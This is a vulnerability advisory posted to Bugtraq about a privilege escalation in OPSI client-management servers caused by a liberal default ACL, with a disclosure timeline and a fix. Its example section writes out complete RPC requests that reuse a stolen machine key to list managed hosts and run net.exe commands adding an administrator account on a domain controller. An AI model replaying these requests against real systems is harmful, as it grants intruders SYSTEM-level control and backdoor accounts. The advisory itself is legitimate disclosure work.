secuvera-SA-2017-01: Privilege escalation in an OPSI Managed- Client environment ("rise of the machines")

From: sbieber@secuvera.de
To: bugtraq@securityfocus.com
Cc:
Subject: secuvera-SA-2017-01: Privilege escalation in an OPSI Managed- Client environment ("rise of the machines")
Date:


Affected Products
   Tested with 
      OPSI Server 4.0.7.26
      OPSI ClientAgent 4.0.7.10-1
   (older releases have not been tested)
   According to the vendor all server instances that use a python-opsi version lower
   than 4.0.7.28-4 are affected

References
   https://www.secuvera.de/advisories/secuvera-SA-2017-01.txt (used for updates)
   https://sourceforge.net/p/opsi/mailman/message/35609086/ (announcement by vendor
   in german language)
   No CVE-Number has been assigned yet.

Summary:
   "opsi is an open source client management system for Windows and Linux 
   clients and is based on Linux servers" (http://uib.de/en/opsi/about-opsi/)
   The default access control list (ACL) configuration of the OPSI-Server 
   shipped with the product prior to Version 4.0.7.28-4 is unsafe so that environ-
   ments using this liberal ACL are vulnerable against remote command execution and
   as a result vulnerable against privilege escalation.

Effect:
   A remote attacker with knowledge of a single machine name and the correspon-
   ding OPSI \u201cmachine key\u201d is able to execute arbitrary commands on any OPSI-
   Managed client in the same managed environment by using the Remote Procedure 
   Call (RPC) Interface of the OPSI-Server. 
   The attacker is able to use the SYSTEM privileges of the OPSI Agent on any
   managed client computer and execute arbitrary commands leading to an elevation
   of privileges.

Example:
   In this example scenario the attacker has or gained local administrative 
   rights to one client computer managed by the OPSI-Client-Agent (e. g. a de-
   veloper that is in need of local administrative rights on his machine). 
   The OPSI Server opsiconfd has the options "verify ip" set to "yes" and 
   "update ip" set to "no". In the course of testing we figured out that these 
   settings have no effect at all.
   With the following steps he is able to gain administrative control over any 
   other PC that is managed by the same OPSI Server instance.
   
   1) Get the own machine name and the corresponding machine key:
               Open 
              %programfiles(x86)%\opsi.org\opsi-client-agent\opsiclientd\/
                opsiclientd.conf
          and extract the values for the following params: host_id, opsi_host_key,
           url (of the config service)
                
           In this scenario the host_id is pc1.test-network.lan.
              
   2) Issue the following HTTP-Request to get a list of machines managed by OPSI:
             POST /rpc HTTP/1.1
         Host: <OPSI-SERVER-IP>:4447
              Content-Length: 136
                Accept-Encoding: deflate, gzip
             Accept: application/json, text/plain
               content-type: application/json
             Authorization: Basic <"host_id:opsi_host_key" coded in base64>
         Connection: close

             {"params": ["*", "", "", "", "", "", "", "", ""], "id": 2, "method": 
              "getClientIds_list", "Hostname": "*"}
                
     The Server responds with a list of managed systems.
        E. g.
            HTTP/1.1 200 OK
            Content-Length: 1227
               Set-Cookie: OPSISID=<somerandomvalue>; path=/
            Accept-Ranges: bytes
               Server: Twisted/16.0.0 TwistedWeb/[OPSI.web2, version 0.2.0]
               Date: <date>
             Content-Type: gzip-application/json;charset=utf-8
          Connection: close

             
           {"id": 2, "result": ["pc1.test-network.lan", "pc2.test-network.lan", 
              "domaincontroller.test-network.lan"], "error": null}
           
           
   3) pick a pc that is not the machine that is originating this request. 
      In this example we will use "domaincontroller.test-network.lan".
         
   4) Issue a request that adds a new user account "JohnConnor" with the Password
      "R3sitanceIs4live":
         POST /rpc HTTP/1.1
         Host: <OPSI-SERVER-IP>:4447
              Content-Length: 136
                Accept-Encoding: deflate, gzip
             Accept: application/json, text/plain
               content-type: application/json
             Authorization: Basic <"host_id:opsi_host_key" coded in base64>
         Connection: close

             
           {"params": ["C:\\Windows\\System32\\net.exe user /add JohnConnor 
           R3sitanceIs4live", "domaincontroller.test-network.lan"], "id": 2, 
                "method": "hostControlSafe_execute"}
           
           
   5) Move the newly created user to the local administrative group:
          POST /rpc HTTP/1.1
         Host: <OPSI-SERVER-IP>:4447
              Content-Length: 136
                Accept-Encoding: deflate, gzip
             Accept: application/json, text/plain
               content-type: application/json
             Authorization: Basic <"host_id:opsi_host_key" coded in base64>
         Connection: close

             
           {"params": ["C:\\Windows\\System32\\net.exe localgroup Administrators 
              JohnConnor /add", "domaincontroller.test-network.lan"], "id": 2, 
         "method": "hostControlSafe_execute"}
   
   
   6) Login to domaincontroller.test-network.lan via RDP or if you like: repeat steps
   4 and 5 for every managed client to gain access on them.
   

Solution:
   Update to OPSI Server to Version 4.0.7.28-4 or higher. Make use of the supplied
   default acl.conf.
   
   
Disclosure Timeline:
   2017/01/09 problem was found during a penetration test
   2017/01/09 vendor contacted via email to info@uib.de and support@uib.de
   2017/01/10 initial vendor response from support@uib.de submitting responsible
                     contact details
   2017/01/10 submitted advisory to responsible contact
   2017/01/10 vendor acknowledged problem and sent a fix. Proposed updating access-
                        control-lists shipped with product
   2017/01/10 supplied fix was verified solving the problem
   2017/01/12 vendor supplied a more strict version of the fix and details about
                    how and when they inform their users
   2017/01/13 vendor supplied a fix for "verify ip" issue
   2017/01/17 vendor publicly announced the fix for ACL and verify ip setting
   2017/01/30 advisory disclosure
   
Credits
 Simon Bieber, secuvera GmbH
        sbieber@secuvera.de
        https://www.secuvera.de

Thanks to:
        Tobias Glemser & Sven Supper, secuvera GmbH 
  and
        Niko Wenselowski, uib GmbH 
    for their support.
     
Disclaimer:
    All information is provided without warranty. The intent is to provide informa-
   tion to secure infrastructure and/or systems, not to be able to attack or damage.
  Therefore secuvera shall not be liable for any direct or indirect damages that 
    might be caused by using this information.





Copyright © 1995-2018 LinuxRocket.net. All rights reserved.